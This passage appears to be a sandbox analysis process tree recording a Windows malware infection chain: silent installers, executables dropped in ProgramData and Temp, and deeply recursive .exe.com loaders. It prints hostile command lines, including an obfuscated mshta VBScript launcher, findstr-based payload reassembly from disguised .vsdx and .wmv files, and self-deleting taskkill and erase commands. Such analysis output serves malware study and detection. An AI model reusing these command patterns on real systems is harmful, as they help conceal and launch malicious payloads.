                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 692
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Program crash
                                                                                                                                                                  PID:6128
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 676
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Program crash
                                                                                                                                                                  PID:3800
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 880
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Program crash
                                                                                                                                                                  PID:5472
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 936
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Program crash
                                                                                                                                                                  PID:6488
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 1100
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Program crash
                                                                                                                                                                  PID:6692
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c Thu21b93295136197.exe
                                                                                                                                                              4⤵
                                                                                                                                                                PID:4052
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS0910A4A4\Thu21b93295136197.exe
                                                                                                                                                                  Thu21b93295136197.exe
                                                                                                                                                                  5⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:4128
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-RKSC9.tmp\Thu21b93295136197.tmp
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-RKSC9.tmp\Thu21b93295136197.tmp" /SL5="$301E2,138429,56832,C:\Users\Admin\AppData\Local\Temp\7zS0910A4A4\Thu21b93295136197.exe"
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:4584
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-ATD0I.tmp\Setup.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-ATD0I.tmp\Setup.exe" /Verysilent
                                                                                                                                                                      7⤵
                                                                                                                                                                        PID:1600
                                                                                                                                                                        • C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe
                                                                                                                                                                          "C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"
                                                                                                                                                                          8⤵
                                                                                                                                                                            PID:5992
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\BSKR.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\BSKR.exe"
                                                                                                                                                                              9⤵
                                                                                                                                                                                PID:7764
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\BSKR.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\BSKR.exe
                                                                                                                                                                                  10⤵
                                                                                                                                                                                    PID:8140
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser144.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser144.exe"
                                                                                                                                                                                  9⤵
                                                                                                                                                                                    PID:4076
                                                                                                                                                                                    • C:\ProgramData\6732920.exe
                                                                                                                                                                                      "C:\ProgramData\6732920.exe"
                                                                                                                                                                                      10⤵
                                                                                                                                                                                        PID:7760
                                                                                                                                                                                      • C:\ProgramData\8935879.exe
                                                                                                                                                                                        "C:\ProgramData\8935879.exe"
                                                                                                                                                                                        10⤵
                                                                                                                                                                                          PID:7908
                                                                                                                                                                                        • C:\ProgramData\6092869.exe
                                                                                                                                                                                          "C:\ProgramData\6092869.exe"
                                                                                                                                                                                          10⤵
                                                                                                                                                                                            PID:8084
                                                                                                                                                                                          • C:\ProgramData\172652.exe
                                                                                                                                                                                            "C:\ProgramData\172652.exe"
                                                                                                                                                                                            10⤵
                                                                                                                                                                                              PID:4800
                                                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                "C:\Windows\System32\mshta.exe" vBSCRIPT: cLOsE ( creatEoBjECT ( "wScRiPt.shELl" ). RuN ("CMD /c TypE ""C:\ProgramData\172652.exe"" > gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if """" =="""" for %B iN ( ""C:\ProgramData\172652.exe"" ) do taskkill /Im ""%~NxB"" /F " , 0 , tRUe ) )
                                                                                                                                                                                                11⤵
                                                                                                                                                                                                  PID:6216
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c TypE "C:\ProgramData\172652.exe"> gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if "" =="" for %B iN ( "C:\ProgramData\172652.exe" ) do taskkill /Im "%~NxB" /F
                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                      PID:4700
                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                        taskkill /Im "172652.exe" /F
                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                        PID:4220
                                                                                                                                                                                                • C:\ProgramData\3899870.exe
                                                                                                                                                                                                  "C:\ProgramData\3899870.exe"
                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                    PID:7772
                                                                                                                                                                                                  • C:\ProgramData\522310.exe
                                                                                                                                                                                                    "C:\ProgramData\522310.exe"
                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                      PID:2152
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Mortician.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Mortician.exe"
                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                      PID:6232
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        "cmd" /c cmd < Cerchia.vsdx
                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                          PID:6044
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            cmd
                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                              PID:7504
                                                                                                                                                                                                              • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                findstr /V /R "^JdxmflaMoKJKGKEonRKIDlCuNBztuuxobvTVXbusdtKZTUcnQFZrvdHmOhLNQgGwfAjlQJkqLaammCjTuVhBisMuOxuJLaA$" Attesa.vsdx
                                                                                                                                                                                                                12⤵
                                                                                                                                                                                                                  PID:6264
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Impedire.exe.com
                                                                                                                                                                                                                  Impedire.exe.com I
                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                    PID:7840
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Impedire.exe.com
                                                                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
                                                                                                                                                                                                                      13⤵
                                                                                                                                                                                                                        PID:4696
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Impedire.exe.com
                                                                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
                                                                                                                                                                                                                          14⤵
                                                                                                                                                                                                                            PID:860
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Impedire.exe.com
                                                                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
                                                                                                                                                                                                                              15⤵
                                                                                                                                                                                                                                PID:7628
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Impedire.exe.com
                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
                                                                                                                                                                                                                                  16⤵
                                                                                                                                                                                                                                    PID:7788
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Impedire.exe.com
                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
                                                                                                                                                                                                                                      17⤵
                                                                                                                                                                                                                                        PID:640
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Impedire.exe.com
                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
                                                                                                                                                                                                                                          18⤵
                                                                                                                                                                                                                                            PID:5300
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Impedire.exe.com
                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
                                                                                                                                                                                                                                              19⤵
                                                                                                                                                                                                                                                PID:7680
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Impedire.exe.com
                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
                                                                                                                                                                                                                                                  20⤵
                                                                                                                                                                                                                                                    PID:7416
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Impedire.exe.com
                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
                                                                                                                                                                                                                                                      21⤵
                                                                                                                                                                                                                                                        PID:4328
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Impedire.exe.com
                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
                                                                                                                                                                                                                                                          22⤵
                                                                                                                                                                                                                                                            PID:5536
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Impedire.exe.com
                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
                                                                                                                                                                                                                                                              23⤵
                                                                                                                                                                                                                                                                PID:7948
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Impedire.exe.com
                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
                                                                                                                                                                                                                                                                  24⤵
                                                                                                                                                                                                                                                                    PID:6888
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Impedire.exe.com
                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
                                                                                                                                                                                                                                                                      25⤵
                                                                                                                                                                                                                                                                        PID:6936
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Impedire.exe.com
                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
                                                                                                                                                                                                                                                                          26⤵
                                                                                                                                                                                                                                                                            PID:7212
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Impedire.exe.com
                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
                                                                                                                                                                                                                                                                              27⤵
                                                                                                                                                                                                                                                                                PID:7816
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Impedire.exe.com
                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
                                                                                                                                                                                                                                                                                  28⤵
                                                                                                                                                                                                                                                                                    PID:7856
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Impedire.exe.com
                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
                                                                                                                                                                                                                                                                                      29⤵
                                                                                                                                                                                                                                                                                        PID:5916
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Impedire.exe.com
                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
                                                                                                                                                                                                                                                                                          30⤵
                                                                                                                                                                                                                                                                                            PID:7268
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Impedire.exe.com
                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
                                                                                                                                                                                                                                                                                              31⤵
                                                                                                                                                                                                                                                                                                PID:3960
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Impedire.exe.com
                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
                                                                                                                                                                                                                                                                                                  32⤵
                                                                                                                                                                                                                                                                                                    PID:7704
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Impedire.exe.com
                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
                                                                                                                                                                                                                                                                                                      33⤵
                                                                                                                                                                                                                                                                                                        PID:7588
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                              ping localhost
                                                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                                                              • Runs ping.exe
                                                                                                                                                                                                                                                              PID:4968
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\foradvertising.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\foradvertising.exe" /wws1
                                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                                          PID:6576
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im "foradvertising.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\foradvertising.exe" & exit
                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                              PID:7804
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                taskkill /im "foradvertising.exe" /f
                                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                                                PID:8120
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\gdgame.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\gdgame.exe"
                                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                                              PID:7960
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\gdgame.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\gdgame.exe" -a
                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                  PID:8116
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\installer.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\installer.exe" /qn CAMPAIGN="710"
                                                                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                                                                  PID:6368
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                                    PID:6928
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-VQBSB.tmp\IBInstaller_74449.tmp
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-VQBSB.tmp\IBInstaller_74449.tmp" /SL5="$40396,14713126,721408,C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                        PID:4380
                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe
                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent
                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                      PID:1220
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-FA5LO.tmp\stats.tmp
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-FA5LO.tmp\stats.tmp" /SL5="$303D8,138429,56832,C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent
                                                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                                                          PID:3776
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          cmd /c cmd < Attesa.wmv
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:5476
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              cmd
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                PID:5576
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                  findstr /V /R "^VksJcWfNcDMqfgfCCoOQaENLrlkioAEZRevWUFgpnuTZyylQxdxsqDodbFGlKiEVZMohRaHWUFajKOGYZxNRyhZgTymgZtndBYqaWXYwInbclWFIZIldx$" Braccio.wmv
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                    PID:5336
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                                                                                                                                                                                    Adorarti.exe.com u
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:5900
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                          PID:5452
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                              PID:7044
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                  PID:6700
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                      PID:5772
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                          PID:5296
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                                                                              PID:5920
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                  PID:5380
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                                                                                      PID:7424
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                                                                                                          PID:7720
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                                                                                                                                                                                                                            13⤵
                                                                                                                                                                                                                                                                                                              PID:8088
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                                                                                                                                                                                                                                14⤵
                                                                                                                                                                                                                                                                                                                  PID:7584
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                                                                                                                                                                                                                                    15⤵
                                                                                                                                                                                                                                                                                                                      PID:3708
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                                                                                                                                                                                                                                        16⤵
                                                                                                                                                                                                                                                                                                                          PID:4804
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                                                                                                                                                                                                                                            17⤵
                                                                                                                                                                                                                                                                                                                              PID:6172
                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                                                                                                                                                                                                                                                18⤵
                                                                                                                                                                                                                                                                                                                                  PID:4860
                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                                                                                                                                                                                                                                                    19⤵
                                                                                                                                                                                                                                                                                                                                      PID:5384
                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                                                                                                                                                                                                                                                        20⤵
                                                                                                                                                                                                                                                                                                                                          PID:7232
                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                                                                                                                                                                                                                                                            21⤵
                                                                                                                                                                                                                                                                                                                                              PID:6800
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                                                                                                                                                                                                                                                                22⤵
                                                                                                                                                                                                                                                                                                                                                  PID:6260
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                                                                                                                                                                                                                                                                    23⤵
                                                                                                                                                                                                                                                                                                                                                      PID:8116
                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                                                                                                                                                                                                                                                                        24⤵
                                                                                                                                                                                                                                                                                                                                                          PID:7440
                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                                                                                                                                                                                                                                                                            25⤵
                                                                                                                                                                                                                                                                                                                                                              PID:5916
                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                                                                                                                                                                                                                                                                                26⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:2664
                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                                                                                                                                                                                                                                                                                    27⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:7652
                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                                                                                                                                                                                                                                                                                        28⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:7444
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                        ping localhost
                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                                        PID:4052
                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                    PID:5936
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                        PID:5956
                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                        PID:5204
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                                                                                                                                                                                                                        dllhost.exe
                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                          PID:5356
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                            PID:6812
                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                                            PID:2004
                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                            PID:5448
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                PID:4328
                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                PID:6748
